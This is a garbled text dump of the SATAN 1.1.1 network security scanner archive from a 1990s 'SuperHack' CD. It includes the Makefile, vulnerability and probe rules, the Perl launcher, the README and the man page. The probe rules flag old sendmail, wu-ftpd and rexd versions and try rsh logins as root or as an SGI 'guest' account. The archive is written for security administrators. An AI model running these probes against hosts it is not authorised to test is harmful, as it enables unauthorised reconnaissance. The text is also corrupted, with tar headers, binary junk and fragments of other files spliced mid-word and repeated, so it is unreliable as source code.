SuperHack

home *** CD-ROM | disk | FTP | other *** search

/ SuperHack / SuperHack CD.bin / Hack / UTILS / SATAN-~1.ZIP / SATAN-~1

Wrap

Text File | 1996-05-19 | 921KB | 26,556 lines

satan-1.1.1/........................................................................................ 755 . 465 . 506 . 0 5742521634 5624. ..................................................................................................... ...............................................................................................................................................................................................................................................................sa tan-1.1.1/Makefile................................................................................ 700 . 465 . 506 . 4240 5741733002 7333. ....................................................................................................... .............................................................................................................................................................................................................................................................SHEL L.= /bin/sh MAKE.= make RPCGEN.= rpcgen #LIBS.= -lsocket -lnsl what: .@echo "Usage: make system-type. Known types are:" .@echo "aix osf bsd bsdi dgux irix4 irix5 freebsd hpux9 linux sunos4 sunos5 sysv4" .@exit 1; aix osf bsd hpux9 sunos4: .@$(MAKE) all LIBS= XFLAGS="-DAUTH_GID_T=int" ultrix4: .@$(MAKE) rpcgen all LIBS= XFLAGS="-DAUTH_GID_T=int" \ ..RPCGEN="../../bin/rpcgen" bsdi: .@$(MAKE) all LIBS="-lrpc" XFLAGS="-DAUTH_GID_T=int" freebsd: .@$(MAKE) all LIBS= XFLAGS="-DAUTH_GID_T=int -DSYS_ERRLIST_DECLARED" linux: .@echo The LINUX rules are untested and may be wrong .@set +e; test -f include/netinet/ip.h || {\ ..echo Please copy the 44BSD /usr/include/netinet include files; \ ..echo files to `pwd`/include/netinet and try again.;\ ..exit 1; \ .} .@$(MAKE) all LIBS= XFLAGS="-I`pwd`/include -DAUTH_GID_T=int" irix4: .@$(MAKE) all LIBS="-lXm_s -lXt_s -lX11_s -lPW -lc_s -lsun" \ ..XFLAGS="-DAUTH_GID_T=int" irix5: .@$(MAKE) all LIBS= XFLAGS="-DAUTH_GID_T=gid_t" dgux: .@$(MAKE) all LIBS="-lnsl" XFLAGS="-DAUTH_GID_T=gid_t -DTIRPC" sunos5: .@$(MAKE) all LIBS="-lsocket -lnsl" XFLAGS="-DAUTH_GID_T=gid_t -DTIRPC" sysv4: .@$(MAKE) rpcgen all LIBS="-lsocket -lnsl" \ ..XFLAGS="-DAUTH_GID_T=gid_t -DTIRPC" \ ..RPCGEN="../../bin/rpcgen" rpcgen: .cd src/rpcgen; $(MAKE) "LIBS=$(LIBS)" "XFLAGS=$(XFLAGS)" all: .cd src/misc; $(MAKE) "LIBS=$(LIBS)" "XFLAGS=$(XFLAGS)" "RPCGEN=$(RPCGEN)" .cd src/boot; $(MAKE) "LIBS=$(LIBS)" "XFLAGS=$(XFLAGS)" "RPCGEN=$(RPCGEN)" .cd src/port_scan; $(MAKE) "LIBS=$(LIBS)" "XFLAGS=$(XFLAGS)" .cd src/nfs-chk; $(MAKE) "LIBS=$(LIBS)" "XFLAGS=$(XFLAGS)" "RPCGEN=$(RPCGEN)" .cd src/yp-chk; $(MAKE) "LIBS=$(LIBS)" "XFLAGS=$(XFLAGS)" "RPCGEN=$(RPCGEN)" .cd src/fping; $(MAKE) "LIBS=$(LIBS)" "CFLAGS=$(XFLAGS)" checksums: .@find * -type f -print | sort | xargs md5 clean: .cd src/misc; $(MAKE) clean .cd src/boot; $(MAKE) clean .cd src/port_scan; $(MAKE) clean .cd src/nfs-chk; $(MAKE) clean .cd src/yp-chk; $(MAKE) clean .cd src/fping; $(MAKE) clean .cd src/rpcgen; $(MAKE) clean .rm -f html/satan.html html/satan_documentation.html status_file \ .bit_bucket tidy:.clean .rm -f *.old *.bak *.orig */*.old */*.bak */*.orig tmp_file* .rm -rf results .chmod -x satan ..7{.....rnlast....(..7|.....rnsoft....8..7}.....exrc.4d...L..7~.....omegarc... ...\..7.....junk.çf...p..7Ç.....sde_lso...0...Ç..7ü.....mailrc....É..7é.....stdwin....ñ..7â.....dosimis...└...┤..7Σ.....mdp...┴...─..7à.....shape.┬...╘..7σ.....cfront....Σ..7ç.....letter....⌠..7ê.....login.┼......7ë....ada.......7è.....article...╟...$..7ï. ....mike..╚...4satan-1.1.1/include/................................................................................ 700 . 465 . 506 . 0 5742521532 7232. ...................................................................................... ................................................................................................................................................................................................................................................................. .............satan-1.1.1/include/netinet/........................................................................ 700 . 465 . 506 . 0 5742521532 10700. ........................................................................................ ................................................................................................................................................................................................................................................................. ...........satan-1.1.1/rules/.................................................................................. 700 . 465 . 506 . 0 5742521533 6742. .......................................................................................... ................................................................................................................................................................................................................................................................. .........satan-1.1.1/rules/facts............................................................................. 600 . 465 . 506 . 3355 5740002724 10054. ............................................................................................ ................................................................................................................................................................................................................................................................. .......# # Rules that deduce new facts from existing data. Each rule is executed once # for each 'a' SATAN record. The rule format is: # #.condition TABs fact # # The condition is a PERL expression that has full access to the global # $target..$text variables, to functions, and to everything that has been # found sofar. The fact is a SATAN record. # # Empty lines and text after a "#" character are ignored. Long lines may # be broken with backslash-newline. # # # version 1, Sun Mar 19 10:32:57 1995, last mod by zen # # # Assume rexd is insecure without even trying # /runs rexd/.$target|assert|a|us|ANY@$target|ANY@ANY|REXD access|rexd is vulnerable # SENDMAIL SECTION ;-) # # assume berkeley versions of sendmail < 8.6.10 are hosed: /sendmail 8\.6\.([0-9]+)/i && $1 < 10 \ ..$target|assert|a|rs|ANY@$target|ANY@$target|Sendmail vulnerabilities|sendmail pre 8.6.10 # # other sendmail versions # HP /HP Sendmail \(1\.37\.109\.11/ \ ..$target|assert|a|rs|ANY@$target|ANY@$target|Sendmail vulnerabilities|sendmail pre 8.6.10 # # Generic (or derived from) BSD; should have something >= 5.60 /[Ss]endmail (5\.60)/ && $1 <= 5.60 \ ..$target|assert|a|rs|ANY@$target|ANY@$target|Sendmail vulnerabilities|sendmail pre 5.61 # # Sequent/DYNIX; if <= 5.65, broken... /[Ss]endmail (5\.65)/ && $1 <= 5.65 && /DYNIX/ \ ..$target|assert|a|rs|ANY@$target|ANY@$target|Sendmail vulnerabilities|DYNIX sendmail, pre 5.65 # # OTHER PROBLEMS # # 220 wuarchive.wustl.edu FTP server (Version wu-2.4(1) Mon /ftp.*\(version wu-2.([0-9]+)/i && $1 < 4 \ ..$target|assert|a|rs|ANY@$target|ANY@$target|FTP vulnerabilities|wuftp pre 2.4 # a modem on a port? Surely you jest... /AT\\[nr].*OK\\[nr]/.$target|assert|a|rs|ANY@$target|ANY@$target|unrestricted modem|unrestricted modem on the Internet ype f -print | sort | xargs md5 clean: .cd src/misc; $(MAKE) clean .cd src/boot; $(MAKE) clean .cd src/port_scan; $(MAKE) clean .cd src/nfs-chk; $(MAKE) clean .cd src/yp-chk; $(MAKE) clean .cd src/fping; $(MAKE) clean .cd src/rpcgen; $(MAKE) clean .rm -f html/satan.html htsatan-1.1.1/rules/hosttype.......................................................................... 600 . 465 . 506 . 6651 5737737655 10665. ............................................................................ ................................................................................................................................................................................................................................................................. .......................# # Rules that recognize host types from telnet/ftp/smtp banners. These are # applied to every telnet/ftp/sendmail record. Format of this file is: # #.CLASS class_name #.condition TABs hosttype # # Empty lines and text after a "#" character are ignored. Long lines may # be broken with backslash-newline. # # The class_name is used for the first rough breakdown by host type in, # for example, reports. It should be a major software category. # # The condition is a PERL expression, with full access to the global # $target..$text variables; HOSTTYPE stands for the current hostname # info for the target host. UNKNOWN is true when the host type is unknown. # # The hosttype field is an expression that evaluates to a host type; # when it is absent, the value $1 is taken. # # # version 1, Sun Mar 26 18:39:56 1995, last mod by zen # # # Beware: AIX 3.x telnetd claims to be version 3. # CLASS AIX /(AIX [.0-9]+)/ /AIX Version ([.0-9]+)/......"AIX $1" /AIX Version ([0-9]) / && length(HOSTTYPE) <= 3..."AIX $1" UNKNOWN && /(AIX)/ # # Beware: Ultrix 4.x ftpd claims to be version 4.1. # CLASS Ultrix /ultrix[\/v ]+([.0-9]+[A-Z]*)/i....."Ultrix $1" /ultrix version 4/i && length(HOSTTYPE) <= 6..."Ultrix 4" UNKNOWN && /ultrix/i......"Ultrix" CLASS VMS /(VAX\/VMS)/ /(OpenVMS)/ UNKNOWN && /MultiNet/......"VAX/VMS" # # The first pattern is good for HP-UX 8.x and 9.x telnetd. # CLASS HP /(HP-UX) .+ ([AB1-7]\.[A-Za-z0-9.]+) /...."$1 $2" UNKNOWN && /(HP-UX)/ UNKNOWN && /HP Sendmail/....."HP-UX" # # What about earlier IRIX versions? # CLASS SGI /IRIX System V.3/......"IRIX 4" /IRIX System V.4/......"IRIX 5" UNKNOWN && /\b(IRIX|SGI)\b/....."IRIX" # # SunOS 4.x ftpd and sendmail claim to be version 4.1 # SunOS 5.x ftpd and telnetd claim to be generic SYSV40 # SunOS 5.x will end up as "other" when they replaced sendmail # CLASS SUN UNKNOWN && /SunOS/......"SunOS 4" /4.1\/SMI-4.1/......."SunOS 4" /SMI-SVR4/......."SunOS 5" # # Domain/OS ftpd gives more specific version information than telnetd. # CLASS APOLLO /(Domain\/OS sr[.0-9]+)/ && length($1) > length(HOSTTYPE) UNKNOWN && /(Domain\/OS)/ /Apollo/......."Domain/OS" # # Beware: NeXTStep 3.x ftp announces itself as NeXT 1.0. # Beware: NeXTStep 3.x sendmail announces itself as NX5.xx/NX3.0. # CLASS NEXT /NX.*\/NX([0-9]+)/......"NeXTStep $1" UNKNOWN && /(NeXT)/......"NeXTStep" # # Data General # CLASS DG/UX UNKNOWN && /\b(DG\/UX)\b/.....$1 /DG\/UX .* Release ([-\/A-Z0-9.]+)/...."DG/UX $1" # # Linux # CLASS LINUX UNKNOWN && /(Linux)/ /(Linux [0-9.]+)/ # # 4.4 BSD, BSDI, etc. # CLASS 4.4 BSD /(FreeBSD|NetBSD)/ # e.g. BSDI BSD/386 1.1 /(BSDI) BSD\/[0-9]+\s([0-9]+)/....."$1 $2" # e.g. BSDI BSD/OS 2.0 /(BSDI) BSD\/OS\s([0-9]+)/....."$1 $2" # # Apple A/UX # CLASS A/UX /A\/UX.([.0-9]+)/......"A/UX $1" /(A\/UX)/ # # Sequent slipped by us! CLASS Sequent /(DYNIX\/ptx)/ /DYNIX$R$ (V[.0-9]+)/......"DYNIX $1" /DYNIX/........"Sequent/DYNIX" # # Sony NEWS-OS CLASS SONY /NEWS-OS Release ([.0-9]+)/....."NEWS-OS $1" /(NEWS-OS)/ # # Missed'em five # CLASS SYSTEM V UNKNOWN && /(System V) Release ([.0-9]+)/..."$1.$2" UNKNOWN && /(System V[.0-9]*)/ # # Not really mainstream, but... # CLASS OSF /OSF\/([.0-9]+)/......"OSF $1" # # Some of these still need some refinement. # CLASS other /(Macintosh|ConvexOS)/ /(Windows NT|OS\/2)/ /VersaTerm/......."Macintosh" /(Codonics|APS-TI|Cray UNICOS)/ /InfiniteStorage/......"Epoch" /(PC\/TCP)/ /(NetWare|NEWT)\s*[Vv]*([.0-9]*)/...."$1 $2" /\b(CMC)\b/ /(Epoch|RTU) / /(IBM VM|IBM MVS)/ ....xnews.svin04:0....T..7┤.....tododb....d..7╡....probes.·...x..7╢... .mosaicpid.....îsatan-1.1.1/rules/services.......................................................................... 600 . 465 . 506 . 2712 5740027176 10603. ..................................................................................... ................................................................................................................................................................................................................................................................. ..............# # Rules that classify hosts by service. These are applied to every 'a' SATAN # record. Basically, they translate the cryptic SATAN record data to something # that is more suitable for reports. # # Format of this file is: # #.class_name #.condition TABs service_name TABS host # # The class_name is SERVERS or CLIENTS. # # The condition is a PERL expression, with full access to the global # $target..$text variables. # # The service_name field specifies a name such as "anonymous FTP" or # "NFS (diskless)". # # The host field specifies the host that takes or provides the service. # When no host is specified, $target is assumed. # # Empty lines and text after a "#" character are ignored. Long lines may # be broken with backslash-newline. # SERVERS $service eq "nntp"...NNTP (Usenet news) $service eq "ftp" && /ANONYMOUS/.Anonymous FTP /NIS server/....NIS /runs NFS| exports \S+ to /..NFS /mounts \S+ from (\S+)/...NFS...$1 /offers domain/....DNS /\/root\/\S+ to \S+/...NFS (diskless) /offers gopher/....Gopher /offers http/....WWW /offers X-[0-9]+$/...X Windows $service eq "xdmcp"...XDM (X login) /telnet on port (\d+)/...Telnet on port $1 /<title>/i && $service ne "http".WWW (non-standard port) /0'QUIT'/ && $service ne "gopher".Gopher (non-standard port) /220.*ftp server/i && $service ne "ftp".FTP (non-standard port) CLIENTS /NIS client/....NIS /\/root\/\S+ to (\S+)/...NFS (diskless)..$1 /exports \S+ to $\S+$/..NFS...$1 /([^| ]+) mounts \S+ from \S+/..NFS...$1 l/....."HP-UX" # # What about earlier IRIX versions? satan-1.1.1/rules/todo.............................................................................. 600 . 465 . 506 . 5222 5741552217 7724. ..................................................................................................... ...............................................................................................................................................................................................................................................................# # Rules that specify what probes to try next. Each rule is applied once # to every 'a' SATAN record. Format of this file is: # #.condition TABs target tool tool-arguments # # Empty lines and text after a "#" character are ignored. Long lines may # be broken with backslash-newline. # # The condition is a PERL expression, with full access to the global # $target..$text variables and to everything else that has been found out # sofar. The target is the host that the tool is aimed at. A "*" before # the tool argument list is a hack that specifies that tool arguments # should be ignored when looking for duplicate tool invocations. # # When the condition is satisfied, the tool is executed as: # #.tool tool-arguments target # # The $junk variable is available for temporary results (wow!). # # The software keeps track of already executed tool invocations. # # version 2, Mon Mar 27 20:42:15 1995, last mod by wietse # # # Output from the rpcinfo probe. Tools will be executed only when # permitted by attack level constraints. # $service eq "mountd"...$target "showmount.satan" $service eq "mountd"...$target "nfs-chk.satan" "-t $short_timeout" $service eq "ypserv"...$target "ypbind.satan" $service eq "rexd"...$target "rex.satan" $service eq "rusersd"...$target "rusers.satan" # # Output from the finger or rusers probe: finger the origin of the login. # $severity eq "l" && "$trustee|$trusted" =~ /(.*)@.*@(.*)/ \ .....$2 "finger.satan" "-u $1" # # Output from the port scanners. Tools will be executed only when # permitted by the attack level constraints. # $service eq "ftp"...$target "ftp.satan" $untrusted_host && $service eq "shell".$target "rsh.satan" $untrusted_host && $service eq "shell".$target "rsh.satan" "-u root" $service eq "tftp"...$target "tftp.satan" $service =~ /X-([0-9]+)/..$target "xhost.satan" "-d $target:$1" # # Output from showmount. The "*" at the beginning of the tool argument # list is a hack that specifies that tool arguments should be ignored # when looking for duplicate tool invocations. # $trustee =~ /\/export\/root\/(.*)@(.*)/ && ($junk = &fix_hostname($1,$2)) ne ""\ .....$target "boot.satan" $junk # # Output from the bootparam probe gives us the NIS domain name. With # ypwhich we can ask the host who its NIS server is. # $service eq "boot" && $service_output =~ /domain (\S+)/ \ .....$target "ypbind.satan" "-d $1" $service eq "boot" && $service_output =~ /domain (\S+)/ \ .....$target "yp-chk.satan" "$1" # # Example of site specific rule; SGI's, for instance, have a "guest", "lp", # and other account with no password when out-of-the-box from SGI. Here's # how you could check for this: $untrusted_host && /IRIX/..$target "rsh.satan" "-u guest" is satisfied, the tool is executed as: # #.tool tool-arguments target # # The $junk variable is available for temporary results (wow!). # # The software keeps track of already executed tool invocations. # # version 2, Mon Mar 27 20:42:15 1995, last mod by wietse # # # Output from the rpcinfo probe. Tools will be executed only when # permitted by attack level consatan-1.1.1/rules/trust............................................................................. 600 . 465 . 506 . 1656 5736327466 10161. ...................................................................... ................................................................................................................................................................................................................................................................. .............................# # Rules that classify hosts by trust relationship. These are applied to # every 'a' SATAN record. Basically, they translate the cryptic SATAN # record data to something that is more suitable for reports. # # Format of this file is: # #.condition TABs relationship # # The condition is a PERL expression, with full access to the global # $target..$text variables. # # The relationship field specifies a name such as "remote login" or # "file sharing". # # Empty lines and text after a "#" character are ignored. Long lines may # be broken with backslash-newline. # # version 1, Mon Mar 27 9:30:32 1995, last mod by wietse # $severity eq "l" && $trustee =~ /^root@/.root login $severity eq "l" && $trustee !~ /^root@/.user login $text =~ /exports \S+ to/...NFS export $text =~ / mounts \S+/....NFS export /serves nis domain/....NIS client $trustee =~ /\/export\/root\/(.*)@(.*)/..boot client /authoritative DNS host/...domain name service he rpcinfo probe. Tools will be executed only when # permitted by attack level consatan-1.1.1/rules/drop.............................................................................. 600 . 465 . 506 . 641 5720110064 7666. ...................................................................... ................................................................................................................................................................................................................................................................. .............................# # Rules that determine what facts should be ignored. Each rule is applied once # for each 'a' SATAN fact. A rule is a PERL condition that has full access to # the $target..$text globals and to all functions. # # Empty lines and text after a "#" character are ignored. Long lines may # be broken with backslash-newline. # # # Don't complain about /cdrom being exported to the world. # $text =~ /exports \/cdrom/i "remote login" or # "file sharing". # # Empty lines and text after a "#" character are ignoredsatan-1.1.1/satan................................................................................... 600 . 465 . 506 . 5645 5742457415 6751. ............................................. ................................................................................................................................................................................................................................................................. ......................................................#!/usr/local/bin/perl5 # # version 3, Tue Apr 4 8:58:13 1995, last mod by wietse # $running_under_satan = 1; require 'config/version.pl'; require 'config/satan.cf'; require 'perl/satan-data.pl'; require 'perl/run-satan.pl'; require 'perl/misc.pl'; require 'perllib/getopts.pl';.# IRIX needs it at the end. # # Defaults are taken from the config file. There are three ways to control # operation: from the command line, from the satan.cf file, and from the # HTML user interface. That's a bit much. # $opt_a = $attack_level; $opt_A = $proximity_descent; $opt_d = $satan_data; $opt_l = $max_proximity_level; $opt_o = $only_attack_these; $opt_O = $dont_attack_these; $opt_s = $attack_proximate_subnets; $opt_S = $status_file; $opt_t = 1; $opt_u = $untrusted_host; $opt_v = 0; $opt_z = $sub_zero_proximity; # # Parse JCL. # $usage = "usage: $0 [options] [targets...] Enters interactive mode when no target host is specified. -a..attack level (0=light, 1=normal, 2=heavy, default $opt_a) -A..proximity descent (default $opt_A) -c list..change variables (list format: \"name=value; name=value; ...\") -d database.data directory (default $opt_d) -i..ignore existing results -l proximity.maximal proximity level (default $opt_l) -o list..scan only these (default '$opt_o') -O list..stay away from these (default '$opt_O') -s..expand primary hosts to subnets -S status_file.pathname with scanning status file (default $opt_S) -t level.timeout (0 = short, 1 = medium, 2 = long, default $opt_t) -u..running from an untrusted host (for rsh/nfs tests) -U..running from a trusted host (for rsh/nfs tests) -v..turn on debugging output -V..print version number -z..when attack level becomes negative, continue at level 0 -Z..stop at attack level 0 "; &Getopts("a:A:c:d:e:il:o:O:sS:t:uUvVzZ") || die $usage; if ($opt_V) { .print "SATAN version $satan_version\n"; .exit 0; } # The power of PERL never stops to amaze me - Wietse for (split(/\s*;\s*/, $opt_c)) { .${$name} = $value if ($name, $value) = split(/\s*=\s*/, $_, 2); } print "SATAN is starting up....\n" if $#ARGV < 0; $debug = $opt_v; @all_attacks = (\@light, \@normal, \@heavy); die "bad attack level: $opt_a\n" unless $all_attacks[$opt_a]; $attack_level = $opt_a; $satan_data = $opt_d; $max_proximity_level = $opt_l; $proximity_descent = $opt_A; $sub_zero_proximity = $opt_z; $sub_zero_proximity = 0 if $opt_Z; $only_attack_these = $opt_o; $dont_attack_these = $opt_O; $attack_proximate_subnets = $opt_s; $status_file = $opt_S; @all_timeouts = ($short_timeout, $med_timeout, $long_timeout); die "bad timeout: $opt_t\n" unless $all_timeouts[$opt_t]; $timeout = $all_timeouts[$opt_t]; $untrusted_host = $opt_u; $untrusted_host = 0 if $opt_U; umask 077;.# DON'T TAKE THIS OUT!!! if ($#ARGV < 0) { .# .# The HTML driver will eventually invoke init_satan() and run_satan(). .# .require 'perl/html.pl'; .&html(); } else { .&init_satan_data(); .&read_satan_data() unless defined($opt_i); .&run_satan(join(' ', @ARGV)); } $1" /(NEWS-OS)/ # # Missed'em five # CLASS SYSTEM V UNKNOWN && /(System V) Release ([.0-9satan-1.1.1/README.................................................................................. 600 . 465 . 506 . 4347 5742460317 6571. ................................................................ ................................................................................................................................................................................................................................................................. ................................... In order get things up and running, - You need a UNIX system to run SATAN. In order to unpack the SATAN archive, .compress -d <satan-X.X.tar.Z | tar xvf - - You will need PERL 5.000 or better (perl5 alpha is NOT good enough), and a WWW browser (Netscape, Mosaic, or Lynx). SATAN looks a lot better on a color display. The FAQ gives hints for MONO screens. - When you collect or view data about hundreds of hosts you will need a machine with enough CPU power (sparc5, indy, or better) and memory (32 MB or better). - Run the "reconfig" script. It will patch some scripts with the pathnames of your PERL 5 executable, and of your WWW browser. If SATAN does not find the WWW browser that you want to use, edit the config/paths.pl file and change the line .$MOSAIC="program_name"; to whatever browser you prefer (make sure to preserve the quotation marks and punctuation of the line.) - Run the "make" command. It will ask you to specify a system type. Most mainstream system types are provided. - When your network lies behind a firewall, you should unset your proxy environment variables (such as $http_proxy $file_proxy, $socks_ns, etc.) and/or change your browser configuration to not use your SOCKS host or HTTP Proxy (see your HTML browser's option section.) - Run the "satan" script. When run without arguments, it will start up a WWW browser. The command-line interface is described in the satan.8 manual page ("nroff -man" format). You must run SATAN as superuser if you want to collect data. - You can run multiple SATAN processes in parallel to speed up data collection, but each process should be given its own database (via the "-d" command-line option). We use one SATAN database per block of 256 addresses (satan -d x.x.x x.x.x). After data collection you can merge SATAN databases in core with the HTML browser (see the documentation on scanning and databases for more on this.) Parallel code and sharing of databases will come at a later date. - Use your browser's PRINT button to print reports. Most documentation is accessible via your WWW browser. Last but not least, SATAN was written to improve Internet security. Don't put our work to shame. .Wietse Venema / Dan Farmer . (satan@fish.com) o:O:sS:t:uUvVzZ") || die $usage; if ($opt_V) { .print "SATAN version $satan_version\n"; .exit 0; } # The power of PERL never stops to amaze me - Wietse for (split(/\s*;\s*/, $opt_c)) { .${$name} = $value if ($name, $value) = split(/\s*=\s*/, $_, 2); } print "SATAN is starting usatan-1.1.1/TODO.................................................................................... 600 . 465 . 506 . 1425 5740233564 6373. ........................................................................... ................................................................................................................................................................................................................................................................. ........................TODO list for future (SATAN version 1.1, 2.0, whatever) ---------------------------------------------------------- o.Enable SATAN to fork and run several scans in parallel o Talk about sending mail/syslog to each host scanned o Look at and deal with subnet masks properly... o Put in a DNS walker o fix rex client strategy (rex client is currently not being used) o get a more complete list of banners from vendors and Internet on what is vulnerable and not, for the rules/* files. o many more bug tests, etc. o.Add AFS testing support; currently there is none o.Add SNMP testing/probing And most importantly: o MAPS! Big graphical maps that can *show* the relationships and are clickable to let users zoom into things, etc... - Run the "satan" script. When run without arguments, it will start up a WWW browser. The command-line interface is described in the satan.8 manual page ("nroff -man" format). You must run SATAN as superuser if you want to collsatan-1.1.1/satan.8................................................................................. 600 . 465 . 506 . 11300 5741741456 7120. ................................................................................... ................................................................................................................................................................................................................................................................. .................TH SATAN 8 .SH NAME satan \- network security scanner .SH SYNOPSIS .B satan .I [options] [primary_target(s)...] .SH DESCRIPTION .B SATAN (Security Administrator Tool for Analyzing Networks) remotely probes systems via the network and stores its findings in a database. The results can be viewed with any Level 2 HTML browser that supports the .I http protocol (e.g. .B Mosaic, Netscape, etc.) .PP When no .I primary_target(s) are specified on the command line, .B SATAN starts up in interactive mode and takes commands from the HTML user interface. .PP When .I primary_target(s) are specified on the command line, .B SATAN collects data from the named hosts, and, possibly, from hosts that it discovers while probing a primary host. A primary target can be a host name, a host address, or a network number. In the latter case, .B SATAN collects data from each host in the named network. .PP .B SATAN can generate reports of hosts by type, service, vulnerability and by trust relationship. In addition, it offers tutorials that explain the nature of vulnerabilities and how they can be eliminated. .PP By default, the behavior of .B SATAN is controlled by a configuration file .I (config/satan.cf). The defaults can be overruled via command-line options or via buttons etc. in the HTML user interface. .PP Options: .IP -a Attack level (0=light, 1=normal, 2=heavy). At level 0, .B SATAN collects information about .I RPC services and from the .I DNS. At level 1, .B SATAN collects banners of well-known services such as .I telnet, smtp and .I ftp, and can usually establish the type of operating system. At level 2, .B SATAN does a more extensive (but still non-intrusive) scan for services. Level 2 scans may result in console error messages. .IP "-A proximity_descent" While .B SATAN extracts information from primary targets, it may discover other hosts. The .I proximity_descent controls by how much the .I attack level decreases when .B SATAN goes from primary targets to secondary ones, and so on. The .I -z option determines what happens when the .I attack level reaches zero. .IP "-c 'name=value; name=value...'" Change the value of arbitrary .B SATAN variables. Example: .sp .ti +3 .DS -c 'dont_use_dns = 1; dont_use_nslookup = 1'. .DE .sp The .I -c option allows you to control configuration and other variables that do not have their own command-line option. The format is a list of name=value pairs separated by semicolons. Variable names have no dollar prefix, and values are not quoted. Whitespace within values is preserved. .IP "-d database" Specifies the name of the database to read from and to save to (default .IR satan_data). .sp When multiple .B SATAN processes are run in parallel, each process should be given its own database (for example, one database per subnet of 256 hosts). Use the .I merge facility of the HTML user interface to merge data from different runs. .IP -i Ignore the contents of the database. .IP "-l proximity" Maximal proximity level. Primary targets have proximity 0, hosts discovered while scanning primaries have proximity level 1, and so on. .B SATAN ignores all hosts that exceed the maximal proximity level. .IP "-o only_attack_these" A list of domain names and/or network numbers of hosts that .B SATAN is permitted to scan. List elements are separated by whitespace or commas. Understands the * shell-like wildcard. .IP "-O dont_attack_these" A list of domain names and/or network numbers that .B SATAN should stay away from. The list has the same format as with the .I -o option. .IP -s Subnet expansion. For each primary target, .B SATAN finds all alive hosts in the target\'s subnet (a block of 256 addresses). .IP "-S status_file" While collecting data, .B SATAN maintains a status file with the last action taken. The default status file is .I status_file. .IP "-t level" Timeout level (0 = short, 1 = medium, 2 = long) for each probe. .IP -u Specifies that .B SATAN is being run from an untrusted host. Access via, for example, the remote shell or network file system services, means that there is a security problem. .IP -U Opposite of the .I -u option. .B SATAN may be run from a possibly trusted host. Access via, for example, the remote shell or network file system services is not necessarily a problem. .IP -v Verbose mode. .B SATAN prints on the standard output what it is doing. This is useful for debugging purposes. .IP -V .B SATAN prints its version number and terminates. .IP -z When scanning non-primary hosts, continue with .I attack level of zero when the level would become negative. The scan continues until the maximal proximity level is reached. .IP -Z Opposite of the .I -z option. .SH FILES .I config/* configuration files .br .I rules/* rule bases .br .I results/* data bases .SH AUTHORS Dan Farmer, Wietse Venema while probing a primary host. A primary target can be a host name, a host address, or a network number. In the latter case, .B SATAN collects data from each host in the named network. .PP .B SATAN can generate reports of hosts by type, service, vulnerability and by trust relationship. In addition, it offers tutorials tsatan-1.1.1/satan.ps................................................................................ 600 . 465 . 506 . 35423 5737775022 7410. ............................................... ................................................................................................................................................................................................................................................................. ....................................................%! %! print on Avery #05499, yellow glow labels %% <</Policies <</PageSize 2 /MediaType 0>> >> %% setpagedevice %% <</PageSize [290 480]>> %% setpagedevice 0.24 0.24 scale /picstr 32 string def 331.5 906.5 translate %%2037 1337 scale %%div 5 407 267 scale /data <ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffe0fffffffffffffffffffffffffffffffffffff9ffffffffffffffff ffffffffffffffffffe0fffffffffffffffffffffffffffffff8000000043fff ffffffffffffffffffffffffffffe0ffffffffffffffffffffffffffffffc000 00000023ffffffffffffffffffffffffffffffe0ffffffffffffffffffffffff ffffe00000000000007fffffffffffffffffffffffffffffe0ffffffffffffff fffffffffffffe00000000000000003fffffffffffffffffffffffffffe0ffff ffffffffffffffffffffffe00000000000000000001fffffffffffffffffffff ffffe0fffffffffffffffffffffffffe000000000000000000000fffffffffff ffffffffffffffe0ffffffffffffffffffffffffe00000000000000000000000 ffffffffffffffffffffffffe0ffffffffffffffffffffffff00000000000000 00000000007fffffffffffffffffffffffe0fffffffffffffffffffffff80000 0000000000000000000000ffffffffffffffffffffffe0ffffffffffffffffff ffffc0000000000000000000000000007fffffffffffffffffffffe0ffffffff fffffffffffffc00000000000000000000000000001fffffffffffffffffffff e0ffffffffffffffffffff0000000000000000000000000000001fffffffffff ffffffffffe0fffffffffffffffffffe0000000000000000000000000000003f ffffffffffffffffffffe0fffffffffffffffffffc0000000000000000000000 000000003fffffffffffffffffffffe0fffffffffffffffffff8000000000000 0000000000000000007fffffffffffffffffffffe0ffffffffffffffffffc000 00000000000000000000000000007fffffffffffffffffffffe0ffffffffffff fffffc000000000000007c18000000000000007fffffffffffffffffffffe0ff ffffffffffffffc0000000000000fffffffe3000000000007fffffffffffffff ffffffe0ffffffffffffffff0000000000003ffffffffffffc000000007fffff ffffffffffffffffe0ffffffffffffffff00000000000fffffffffffffffc000 00007fffffffffffffffffffffe0fffffffffffffff800000000003fffffffff fffffff80000007fffffffffffffffffffffe0ffffffffffffffe00000000003 fffffffffffffffffff000007fffffffffffffffffffffe0ffffffffffffffe0 000000007fffffffffffffffffffff0000ffffffffffffffffffffffe0ffffff ffffffffc000000003ffffffffffffffffffffffc000ffffffffffffffffffff ffe0ffffffffffffff000000001ffffffffffffffffffffffff000ffffffffff ffffffffffffe0fffffffffffffc00000000fffffffffffffffffffffffff801 ffffffffffffffffffffffe0fffffffffffffc00000003ffffffffffffffffff fffffffe01ffffffffffffffffffffffe0fffffffffffff00000000fffffffff ffffffffffffffffff81ffffffffffffffffffffffe0ffffffffffff80000000 3fffffffffffffffffffffffffffc3ffffffffffffffffffffffe0ffffffffff ff80000007ffffffffffffffffffffc0fffffff3ffffffffffffffffffffffe0 fffffffffffe0000000f83ffffffffffffffffffc00fffffffffffffffffffff ffffffffe0fffffffffffc0000007e00ffffffffffffffffffc0007fffffffff ffffffffffffffffffe0fffffffffff8000001fe03ffffffffffffffffff8000 1fffffffffffffffffffffffffffe0fffffffffff0000007f800ffffffffffff ffffff800007ffffffffffffffffffffffffffe0ffffffffffe000001ff8007f ffffffffffffffff800001ffffffffffffffffffffffffffe0ffffffffff8000 007ff8001fffffffffffffffff800001ffffffffffffffffffffffffffe0ffff ffffff800001fff8001fffffffffffffffff8000007fffffffffffffffffffff ffffe0fffffffffe000007fffc000f8fffffffffffffff0000000fffffffffff ffffffffffffffe0fffffffffc00001ffffc00060fffffffffffffff00000007 ffffffffffffffffffffffffe0fffffffff000007ffffc000007ffffffffffff ff00000003ffffffffffffffffffffffffe0fffffffff00000fffff8000007ff ffffffffffff00000001ffffffffffffffffffffffffe0ffffffffe00003ffff f8000007ffff3fffe7ffff00000000ffffffffffffffffffffffffe0ffffffff 800007fffff000000fffff3fff83fffe000000007fffffffffffffffffffffff e0ffffffff80001fffffe000003ffffc00fc01ffff000000001fffffffffffff ffffffffffe0ffffffff00003fffffc000007ffffc00f801ffff000000000fff ffffffffffffffffffffe0fffffffe0000fffffe000001fffffe00f800ffff00 